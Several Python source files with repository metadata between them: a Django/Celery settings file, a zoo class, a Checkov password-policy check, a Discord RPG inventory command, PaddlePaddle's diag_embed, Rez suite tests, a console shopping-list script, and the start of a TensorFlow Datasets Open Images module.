CELERYBEAT_SCHEDULE = {
'add-every-30-seconds': {
'task': 'github.tasks.get_data',
'schedule': crontab(minute=0, hour='22'), # execute every day at 10 pm
},
} | 26.16129 | 80 | 0.663132 |
import os
import json
from celery.schedules import crontab
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
try:
with open('config.json') as f:
JSON_DATA = json.load(f)
except FileNotFoundError:
with open('config.sample.json') as f:
JSON_DATA = json.load(f)
SECRET_KEY = os.environ.get('SECRET_KEY', JSON_DATA['secret_key'])
DEBUG = os.environ.get('DEBUG', False)
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'debug_toolbar',
'github'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'hiren.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hiren.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
if 'TRAVIS' in os.environ:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'travisci',
'USER': 'postgres',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'hiren_github_management',
'USER': 'hiren',
'PASSWORD': 'hiren',
'HOST': 'localhost',
'PORT': '',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Dhaka'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder"
)
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
LOGIN_URL = '/'
# CELERY STUFF
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERYBEAT_SCHEDULE = {
'add-every-30-seconds': {
'task': 'github.tasks.get_data',
'schedule': crontab(minute=0, hour='22'), # execute every day at 10 pm
},
} | true | true |
7900f558ba3cb2a22f1e91d6aea1398154ad6999 | 227 | py | Python | encapsulation_exercise/wild_cat_zoo/project/cheetah.py | Veselin-Stoilov/software-university-OOP | 452a77cabf2e7d93f30f629c67c6b22682eb255d | [
"MIT"
] | null | null | null | encapsulation_exercise/wild_cat_zoo/project/cheetah.py | Veselin-Stoilov/software-university-OOP | 452a77cabf2e7d93f30f629c67c6b22682eb255d | [
"MIT"
] | null | null | null | encapsulation_exercise/wild_cat_zoo/project/cheetah.py | Veselin-Stoilov/software-university-OOP | 452a77cabf2e7d93f30f629c67c6b22682eb255d | [
"MIT"
] | null | null | null | from encapsulation_exercise.wild_cat_zoo.project.animal import Animal
class Cheetah(Animal):
MONEY_FOR_CARE = 60
def __init__(self, name, gender, age):
super().__init__(name, gender, age, self.MONEY_FOR_CARE) | 28.375 | 69 | 0.744493 | from encapsulation_exercise.wild_cat_zoo.project.animal import Animal
class Cheetah(Animal):
MONEY_FOR_CARE = 60
def __init__(self, name, gender, age):
super().__init__(name, gender, age, self.MONEY_FOR_CARE) | true | true |
7900f75862ab17d020e9f97590f0c8a2e4e2eda3 | 690 | py | Python | checkov/terraform/checks/resource/alicloud/PasswordPolicyLowercaseLetter.py | pmalkki/checkov | b6cdf386dd976fe27c16fed6d550756a678a5d7b | [
"Apache-2.0"
] | null | null | null | checkov/terraform/checks/resource/alicloud/PasswordPolicyLowercaseLetter.py | pmalkki/checkov | b6cdf386dd976fe27c16fed6d550756a678a5d7b | [
"Apache-2.0"
] | null | null | null | checkov/terraform/checks/resource/alicloud/PasswordPolicyLowercaseLetter.py | pmalkki/checkov | b6cdf386dd976fe27c16fed6d550756a678a5d7b | [
"Apache-2.0"
] | null | null | null | from checkov.common.models.enums import CheckCategories
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
class PasswordPolicyLowercaseLetter(BaseResourceValueCheck):
def __init__(self):
name = "Ensure RAM password policy requires at least one lowercase letter"
id = "CKV_ALI_17"
supported_resources = ['alicloud_ram_account_password_policy']
categories = [CheckCategories.IAM]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def get_inspected_key(self):
return 'require_lowercase_characters'
check = PasswordPolicyLowercaseLetter()
| 38.333333 | 106 | 0.778261 | from checkov.common.models.enums import CheckCategories
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
class PasswordPolicyLowercaseLetter(BaseResourceValueCheck):
def __init__(self):
name = "Ensure RAM password policy requires at least one lowercase letter"
id = "CKV_ALI_17"
supported_resources = ['alicloud_ram_account_password_policy']
categories = [CheckCategories.IAM]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def get_inspected_key(self):
return 'require_lowercase_characters'
check = PasswordPolicyLowercaseLetter()
| true | true |
7900f7c8aad75edcf055538b87ce505314e70cce | 952 | py | Python | tarakania_rpg/commands/rpg/inventory/inventory.py | tarakania/discord-bot | 801d7004589800c6013f32a3289f4b8277b289b2 | [
"MIT"
] | 1 | 2021-06-04T16:50:42.000Z | 2021-06-04T16:50:42.000Z | tarakania_rpg/commands/rpg/inventory/inventory.py | tarakania/discord-bot | 801d7004589800c6013f32a3289f4b8277b289b2 | [
"MIT"
] | 3 | 2021-06-02T00:22:51.000Z | 2021-06-03T15:20:25.000Z | tarakania_rpg/commands/rpg/inventory/inventory.py | tarakania/discord-bot | 801d7004589800c6013f32a3289f4b8277b289b2 | [
"MIT"
] | 2 | 2019-08-22T07:30:12.000Z | 2021-06-04T16:49:42.000Z | from typing import Dict
from handler import Context, Arguments, CommandResult
from rpg.items import Item
from utils.formatting import codeblock
from utils.command_helpers import get_author_player
async def run(ctx: Context, args: Arguments) -> CommandResult:
player = await get_author_player(ctx)
if player.inventory.size:
counts: Dict[Item, int] = {}
for item in player.inventory:
counts[item] = counts.get(item, 0) + 1
inventory = "\n".join(
f"{item}{' x ' + str(count) if count > 1 else ''}"
for item, count in counts.items()
)
else:
inventory = "Ваш инвентарь пуст"
equipment_item_map = [
(slot, getattr(player.equipment, slot)) for slot in player.equipment._slots
]
equipment = "\n".join(f"{slot:>10}: {item}" for (slot, item) in equipment_item_map)
return codeblock(f"Экипировка:\n\n{equipment}\n\nИнвентарь:\n\n{inventory}")
| 30.709677 | 87 | 0.652311 | from typing import Dict
from handler import Context, Arguments, CommandResult
from rpg.items import Item
from utils.formatting import codeblock
from utils.command_helpers import get_author_player
async def run(ctx: Context, args: Arguments) -> CommandResult:
player = await get_author_player(ctx)
if player.inventory.size:
counts: Dict[Item, int] = {}
for item in player.inventory:
counts[item] = counts.get(item, 0) + 1
inventory = "\n".join(
f"{item}{' x ' + str(count) if count > 1 else ''}"
for item, count in counts.items()
)
else:
inventory = "Ваш инвентарь пуст"
equipment_item_map = [
(slot, getattr(player.equipment, slot)) for slot in player.equipment._slots
]
equipment = "\n".join(f"{slot:>10}: {item}" for (slot, item) in equipment_item_map)
return codeblock(f"Экипировка:\n\n{equipment}\n\nИнвентарь:\n\n{inventory}")
| true | true |
7900f903e7fd2f5bc298d18b28fd602f309238e9 | 5,990 | py | Python | python/paddle/nn/functional/extension.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | 1 | 2021-04-28T13:47:27.000Z | 2021-04-28T13:47:27.000Z | python/paddle/nn/functional/extension.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | null | null | null | python/paddle/nn/functional/extension.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: define the extention functions
import numpy as np
from ...fluid.data_feeder import check_dtype
from ...fluid.layer_helper import LayerHelper
from ...fluid.framework import Variable, in_dygraph_mode
from ...fluid.layers.tensor import assign
from ...fluid import core, dygraph_utils
from ...fluid.layers.layer_function_generator import templatedoc
from ...fluid.layers.sequence_lod import sequence_mask
def diag_embed(input, offset=0, dim1=-2, dim2=-1):
"""
This OP creates a tensor whose diagonals of certain 2D planes (specified by dim1 and dim2)
are filled by ``input``. By default, a 2D plane formed by the last two dimensions
of the returned tensor will be selected.
The argument ``offset`` determines which diagonal is generated:
- If offset = 0, it is the main diagonal.
- If offset > 0, it is above the main diagonal.
- If offset < 0, it is below the main diagonal.
Args:
input(Tensor|numpy.ndarray): The input tensor. Must be at least 1-dimensional. The input data type should be float32, float64, int32, int64.
offset(int, optional): Which diagonal to consider. Default: 0 (main diagonal).
dim1(int, optional): The first dimension with respect to which to take diagonal. Default: -2.
dim2(int, optional): The second dimension with respect to which to take diagonal. Default: -1.
Returns:
Tensor, the output data type is the same as input data type.
Examples:
.. code-block:: python
import paddle.nn.functional as F
import numpy as np
diag_embed = np.random.randn(2, 3).astype('float32')
# [[ 0.7545889 , -0.25074545, 0.5929117 ],
# [-0.6097662 , -0.01753256, 0.619769 ]]
data1 = F.diag_embed(diag_embed)
data1.numpy()
# [[[ 0.7545889 , 0. , 0. ],
# [ 0. , -0.25074545, 0. ],
# [ 0. , 0. , 0.5929117 ]],
# [[-0.6097662 , 0. , 0. ],
# [ 0. , -0.01753256, 0. ],
# [ 0. , 0. , 0.619769 ]]]
data2 = F.diag_embed(diag_embed, offset=-1, dim1=0, dim2=2)
data2.numpy()
# [[[ 0. , 0. , 0. , 0. ],
# [ 0.7545889 , 0. , 0. , 0. ],
# [ 0. , -0.25074545, 0. , 0. ],
# [ 0. , 0. , 0.5929117 , 0. ]],
#
# [[ 0. , 0. , 0. , 0. ],
# [-0.6097662 , 0. , 0. , 0. ],
# [ 0. , -0.01753256, 0. , 0. ],
# [ 0. , 0. , 0.619769 , 0. ]]]
data3 = F.diag_embed(diag_embed, offset=1, dim1=0, dim2=2)
data3.numpy()
# [[[ 0. , 0.7545889 , 0. , 0. ],
# [ 0. , -0.6097662 , 0. , 0. ]],
#
# [[ 0. , 0. , -0.25074545, 0. ],
# [ 0. , 0. , -0.01753256, 0. ]],
#
# [[ 0. , 0. , 0. , 0.5929117 ],
# [ 0. , 0. , 0. , 0.619769 ]],
#
# [[ 0. , 0. , 0. , 0. ],
# [ 0. , 0. , 0. , 0. ]]]
"""
inputs = {'Input': [input]}
attrs = {'offset': offset, 'dim1': dim1, 'dim2': dim2}
if not isinstance(input, Variable):
input = assign(input)
def __check_input(input, offset, dim1, dim2):
check_dtype(input.dtype, 'Input',
['int32', 'int64', 'float16', 'float32', 'float64'],
'diag_embed')
input_shape = list(input.shape)
assert len(input_shape) >= 1, \
"Input must be at least 1-dimensional, " \
"But received Input's dimensional: %s.\n" % \
len(input_shape)
assert np.abs(dim1) <= len(input_shape), \
"Dim1 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape) + 1), len(input_shape), dim1)
assert np.abs(dim2) <= len(input_shape), \
"Dim2 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape) + 1), len(input_shape), dim2)
dim1_ = dim1 if dim1 >= 0 else len(input_shape) + dim1 + 1
dim2_ = dim2 if dim2 >= 0 else len(input_shape) + dim2 + 1
assert dim1_ != dim2_, \
"dim1 and dim2 cannot be the same dimension." \
"But received dim1 = %d, dim2 = %d\n"%(dim1, dim2)
if not in_dygraph_mode():
__check_input(input, offset, dim1, dim2)
helper = LayerHelper("diag_embed", **locals())
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='diag_embed',
inputs={'Input': [input]},
attrs={'offset': offset,
'dim1': dim1,
'dim2': dim2},
outputs={'Out': [out]})
out.stop_gradient = True
return out
| 42.785714 | 148 | 0.497663 |
import numpy as np
from ...fluid.data_feeder import check_dtype
from ...fluid.layer_helper import LayerHelper
from ...fluid.framework import Variable, in_dygraph_mode
from ...fluid.layers.tensor import assign
from ...fluid import core, dygraph_utils
from ...fluid.layers.layer_function_generator import templatedoc
from ...fluid.layers.sequence_lod import sequence_mask
def diag_embed(input, offset=0, dim1=-2, dim2=-1):
inputs = {'Input': [input]}
attrs = {'offset': offset, 'dim1': dim1, 'dim2': dim2}
if not isinstance(input, Variable):
input = assign(input)
def __check_input(input, offset, dim1, dim2):
check_dtype(input.dtype, 'Input',
['int32', 'int64', 'float16', 'float32', 'float64'],
'diag_embed')
input_shape = list(input.shape)
assert len(input_shape) >= 1, \
"Input must be at least 1-dimensional, " \
"But received Input's dimensional: %s.\n" % \
len(input_shape)
assert np.abs(dim1) <= len(input_shape), \
"Dim1 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape) + 1), len(input_shape), dim1)
assert np.abs(dim2) <= len(input_shape), \
"Dim2 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape) + 1), len(input_shape), dim2)
dim1_ = dim1 if dim1 >= 0 else len(input_shape) + dim1 + 1
dim2_ = dim2 if dim2 >= 0 else len(input_shape) + dim2 + 1
assert dim1_ != dim2_, \
"dim1 and dim2 cannot be the same dimension." \
"But received dim1 = %d, dim2 = %d\n"%(dim1, dim2)
if not in_dygraph_mode():
__check_input(input, offset, dim1, dim2)
helper = LayerHelper("diag_embed", **locals())
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='diag_embed',
inputs={'Input': [input]},
attrs={'offset': offset,
'dim1': dim1,
'dim2': dim2},
outputs={'Out': [out]})
out.stop_gradient = True
return out
| true | true |
7900f9757b2ab84c948d51c8026907843dc354ac | 5,805 | py | Python | vendors/rez-2.23.1-py2.7/rez/tests/test_suites.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | 4 | 2019-01-11T03:41:28.000Z | 2019-09-12T06:57:17.000Z | vendors/rez-2.23.1-py2.7/rez/tests/test_suites.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | null | null | null | vendors/rez-2.23.1-py2.7/rez/tests/test_suites.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | 2 | 2019-01-10T05:00:18.000Z | 2020-02-15T16:32:56.000Z | """
test suites
"""
from rez.tests.util import TestBase, TempdirMixin
from rez.resolved_context import ResolvedContext
from rez.suite import Suite
import rez.vendor.unittest2 as unittest
import uuid
import os.path
class TestRezSuites(TestBase, TempdirMixin):
@classmethod
def setUpClass(cls):
TempdirMixin.setUpClass()
path = os.path.dirname(__file__)
packages_path = os.path.join(path, "data", "suites", "packages")
cls.settings = dict(
packages_path=[packages_path],
package_filter=None,
implicit_packages=[],
warn_untimestamped=False,
resolve_caching=False)
@classmethod
def tearDownClass(cls):
TempdirMixin.tearDownClass()
def _test_serialization(self, suite):
name = uuid.uuid4().hex
path = os.path.join(self.root, name)
suite.save(path)
suite2 = Suite.load(path)
self.assertEqual(suite.get_tools(), suite2.get_tools())
self.assertEqual(set(suite.context_names), set(suite2.context_names))
def test_1(self):
"""Test empty suite."""
path = os.path.join(self.root, "suite1")
s = Suite()
tools = s.get_tools()
self.assertEqual(tools, {})
self._test_serialization(s)
def test_2(self):
"""Test basic suite."""
c_foo = ResolvedContext(["foo"])
c_bah = ResolvedContext(["bah"])
s = Suite()
s.add_context("foo", c_foo)
s.add_context("bah", c_bah)
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.set_context_prefix("foo", "fx_")
expected_tools = set(["fx_fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.set_context_suffix("foo", "_fun")
s.set_context_suffix("bah", "_anim")
expected_tools = set(["fx_fooer_fun", "bahbah_anim", "blacksheep_anim"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.remove_context("bah")
expected_tools = set(["fx_fooer_fun"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.add_context("bah", c_bah)
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.alias_tool("bah", "blacksheep", "whitesheep")
expected_tools = set(["fx_fooer_fun", "bahbah", "whitesheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
# explicit alias takes precedence over prefix/suffix
s.alias_tool("foo", "fooer", "floober")
expected_tools = set(["floober", "bahbah", "whitesheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.unalias_tool("foo", "fooer")
s.unalias_tool("bah", "blacksheep")
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.hide_tool("bah", "bahbah")
expected_tools = set(["fx_fooer_fun", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.unhide_tool("bah", "bahbah")
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self._test_serialization(s)
def test_3(self):
"""Test tool clashes in a suite."""
c_foo = ResolvedContext(["foo"])
c_bah = ResolvedContext(["bah"])
s = Suite()
s.add_context("foo", c_foo)
s.add_context("bah", c_bah)
s.add_context("bah2", c_bah)
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self.assertEqual(s.get_tool_context("bahbah"), "bah2")
self.assertEqual(s.get_tool_context("blacksheep"), "bah2")
s.bump_context("bah")
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self.assertEqual(s.get_tool_context("blacksheep"), "bah")
expected_conflicts = set(["bahbah", "blacksheep"])
self.assertEqual(set(s.get_conflicting_aliases()), expected_conflicts)
s.set_context_prefix("bah", "hey_")
expected_tools = set(["fooer", "bahbah", "blacksheep",
"hey_bahbah", "hey_blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.remove_context_prefix("bah")
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self.assertEqual(s.get_tool_context("blacksheep"), "bah")
s.hide_tool("bah", "bahbah")
self.assertEqual(s.get_tool_context("bahbah"), "bah2")
s.unhide_tool("bah", "bahbah")
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self._test_serialization(s)
if __name__ == '__main__':
unittest.main()
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| 36.974522 | 80 | 0.641171 | from rez.tests.util import TestBase, TempdirMixin
from rez.resolved_context import ResolvedContext
from rez.suite import Suite
import rez.vendor.unittest2 as unittest
import uuid
import os.path
class TestRezSuites(TestBase, TempdirMixin):
@classmethod
def setUpClass(cls):
TempdirMixin.setUpClass()
path = os.path.dirname(__file__)
packages_path = os.path.join(path, "data", "suites", "packages")
cls.settings = dict(
packages_path=[packages_path],
package_filter=None,
implicit_packages=[],
warn_untimestamped=False,
resolve_caching=False)
@classmethod
def tearDownClass(cls):
TempdirMixin.tearDownClass()
def _test_serialization(self, suite):
name = uuid.uuid4().hex
path = os.path.join(self.root, name)
suite.save(path)
suite2 = Suite.load(path)
self.assertEqual(suite.get_tools(), suite2.get_tools())
self.assertEqual(set(suite.context_names), set(suite2.context_names))
def test_1(self):
path = os.path.join(self.root, "suite1")
s = Suite()
tools = s.get_tools()
self.assertEqual(tools, {})
self._test_serialization(s)
def test_2(self):
c_foo = ResolvedContext(["foo"])
c_bah = ResolvedContext(["bah"])
s = Suite()
s.add_context("foo", c_foo)
s.add_context("bah", c_bah)
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.set_context_prefix("foo", "fx_")
expected_tools = set(["fx_fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.set_context_suffix("foo", "_fun")
s.set_context_suffix("bah", "_anim")
expected_tools = set(["fx_fooer_fun", "bahbah_anim", "blacksheep_anim"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.remove_context("bah")
expected_tools = set(["fx_fooer_fun"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.add_context("bah", c_bah)
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.alias_tool("bah", "blacksheep", "whitesheep")
expected_tools = set(["fx_fooer_fun", "bahbah", "whitesheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.alias_tool("foo", "fooer", "floober")
expected_tools = set(["floober", "bahbah", "whitesheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.unalias_tool("foo", "fooer")
s.unalias_tool("bah", "blacksheep")
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.hide_tool("bah", "bahbah")
expected_tools = set(["fx_fooer_fun", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.unhide_tool("bah", "bahbah")
expected_tools = set(["fx_fooer_fun", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self._test_serialization(s)
def test_3(self):
c_foo = ResolvedContext(["foo"])
c_bah = ResolvedContext(["bah"])
s = Suite()
s.add_context("foo", c_foo)
s.add_context("bah", c_bah)
s.add_context("bah2", c_bah)
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self.assertEqual(s.get_tool_context("bahbah"), "bah2")
self.assertEqual(s.get_tool_context("blacksheep"), "bah2")
s.bump_context("bah")
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self.assertEqual(s.get_tool_context("blacksheep"), "bah")
expected_conflicts = set(["bahbah", "blacksheep"])
self.assertEqual(set(s.get_conflicting_aliases()), expected_conflicts)
s.set_context_prefix("bah", "hey_")
expected_tools = set(["fooer", "bahbah", "blacksheep",
"hey_bahbah", "hey_blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
s.remove_context_prefix("bah")
expected_tools = set(["fooer", "bahbah", "blacksheep"])
self.assertEqual(set(s.get_tools().keys()), expected_tools)
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self.assertEqual(s.get_tool_context("blacksheep"), "bah")
s.hide_tool("bah", "bahbah")
self.assertEqual(s.get_tool_context("bahbah"), "bah2")
s.unhide_tool("bah", "bahbah")
self.assertEqual(s.get_tool_context("bahbah"), "bah")
self._test_serialization(s)
if __name__ == '__main__':
unittest.main()
| true | true |
7900fa4748b918b5153b94375a25c9bc355d756a | 2,466 | py | Python | pythonProject/ind.py | surai5a/laba_2_6 | dab2f35f3dca88620c08c438b85cfd64f9b2172b | [
"MIT"
] | null | null | null | pythonProject/ind.py | surai5a/laba_2_6 | dab2f35f3dca88620c08c438b85cfd64f9b2172b | [
"MIT"
] | null | null | null | pythonProject/ind.py | surai5a/laba_2_6 | dab2f35f3dca88620c08c438b85cfd64f9b2172b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
if __name__ == '__main__':
goods = []
while True:
command = input(">>> ").lower()
if command == 'exit':
break
elif command == 'add':
name = input("Название товара: ")
shop = input("Название магазина: ")
price = float(input("Стоимость: "))
good = {
'name': name,
'shop': shop,
'price': price,
}
goods.append(good)
# Отсортировать список в случае необходимости.
if len(goods) > 1:
goods.sort(key=lambda item: item.get('shop', ''))
elif command == 'list':
line = '+-{}-+-{}-+-{}-+-{}-+'.format(
'-' * 4,
'-' * 30,
'-' * 20,
'-' * 8
)
print(line)
print(
'| {:^4} | {:^30} | {:^20} | {:^8} |'.format(
"№",
"Название",
"Магазин",
"Цена"
)
)
print(line)
for idx, good in enumerate(goods, 1):
print(
'| {:>4} | {:<30} | {:<20} | {:>8} |'.format(
idx,
good.get('name', ''),
good.get('shop', ''),
good.get('price', 0)
)
)
print(line)
elif command.startswith('select '):
parts = command.split(' ', maxsplit=1)
shopName = parts[1]
count = 0
for good in goods:
if shopName == good.get('shop', shopName):
count += 1
print(
'{:>4}: {}'.format(count, good.get('name', ''))
)
if count == 0:
print("Такого магазина не существует либо нет товаров.")
elif command == 'help':
print("Список команд:\n")
print("add - добавить товар;")
print("list - вывести список товаров;")
print("select <имя магазина> - запросить товары магазина;")
print("help - отобразить справку;")
print("exit - завершить работу с программой.")
else:
print(f"Неизвестная команда {command}", file=sys.stderr) | 29.011765 | 72 | 0.37794 |
import sys
if __name__ == '__main__':
goods = []
while True:
command = input(">>> ").lower()
if command == 'exit':
break
elif command == 'add':
name = input("Название товара: ")
shop = input("Название магазина: ")
price = float(input("Стоимость: "))
good = {
'name': name,
'shop': shop,
'price': price,
}
goods.append(good)
if len(goods) > 1:
goods.sort(key=lambda item: item.get('shop', ''))
elif command == 'list':
line = '+-{}-+-{}-+-{}-+-{}-+'.format(
'-' * 4,
'-' * 30,
'-' * 20,
'-' * 8
)
print(line)
print(
'| {:^4} | {:^30} | {:^20} | {:^8} |'.format(
"№",
"Название",
"Магазин",
"Цена"
)
)
print(line)
for idx, good in enumerate(goods, 1):
print(
'| {:>4} | {:<30} | {:<20} | {:>8} |'.format(
idx,
good.get('name', ''),
good.get('shop', ''),
good.get('price', 0)
)
)
print(line)
elif command.startswith('select '):
parts = command.split(' ', maxsplit=1)
shopName = parts[1]
count = 0
for good in goods:
if shopName == good.get('shop', shopName):
count += 1
print(
'{:>4}: {}'.format(count, good.get('name', ''))
)
if count == 0:
print("Такого магазина не существует либо нет товаров.")
elif command == 'help':
print("Список команд:\n")
print("add - добавить товар;")
print("list - вывести список товаров;")
print("select <имя магазина> - запросить товары магазина;")
print("help - отобразить справку;")
print("exit - завершить работу с программой.")
else:
print(f"Неизвестная команда {command}", file=sys.stderr) | true | true |
7900fc68e356ecdd74f17c5a5d271da9a0f3d240 | 8,015 | py | Python | tensorflow_datasets/object_detection/open_images_challenge2019.py | shashwat9kumar/datasets | 99b055408025f8e934fcbb0fc054488aa087ebfb | [
"Apache-2.0"
] | 1 | 2019-07-19T15:01:45.000Z | 2019-07-19T15:01:45.000Z | tensorflow_datasets/object_detection/open_images_challenge2019.py | shashwat9kumar/datasets | 99b055408025f8e934fcbb0fc054488aa087ebfb | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/object_detection/open_images_challenge2019.py | shashwat9kumar/datasets | 99b055408025f8e934fcbb0fc054488aa087ebfb | [
"Apache-2.0"
] | 1 | 2021-08-02T22:12:40.000Z | 2021-08-02T22:12:40.000Z | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Datasets of the Open Images Challange 2019.
https://storage.googleapis.com/openimages/web/challenge2019.html
"""
import abc
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_DESCRIPTION = """\
Open Images is a collaborative release of ~9 million images annotated with
image-level labels, object bounding boxes, object segmentation masks, and
visual relationships. This uniquely large and diverse dataset is designed to
spur state of the art advances in analyzing and understanding images.
"""
_DESCRIPTION_DETECTION = """\
This contains the data from thee Object Detection track of the competition.
The goal in this track is to predict a tight bounding box around all object
instances of 500 classes.
The images are annotated with positive image-level labels, indicating certain
object classes are present, and with negative image-level labels, indicating
certain classes are absent. In the competition, all other unannotated classes
are excluded from evaluation in that image. For each positive image-level label
in an image, every instance of that object class in the image was annotated.
"""
